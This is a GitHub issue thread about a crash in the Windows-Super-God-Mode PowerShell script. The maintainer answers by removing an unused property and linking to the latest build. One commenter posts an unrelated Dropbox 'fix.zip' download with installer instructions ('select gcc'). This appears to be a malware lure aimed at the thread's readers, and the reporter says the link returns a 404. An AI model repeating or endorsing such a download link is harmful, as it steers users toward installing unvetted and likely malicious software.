### ISSUE TITLE
the script explodes

### ISSUE THREAD

**Issue by ShadeblastHere** [ThioJoe/Windows-Super-God-Mode#10]
![image](https://github.com/user-attachments/assets/4a4e365e-07bd-44ed-98d1-a8a5c0e9810c)

tha's about it

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by ShadeblastHere** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

if only the link worked and didn't lead to a 404

**Comment by ThioJoe** [comment]
Hm i'll probably just take out the 'glyph' property collection entirely, it doesn't even get used.

**Comment by ThioJoe** [comment]
Should be fixed in next release version but you can try the latest build here: https://github.com/ThioJoe/Windows-Super-God-Mode/blob/main/Super_God_Mode.ps1
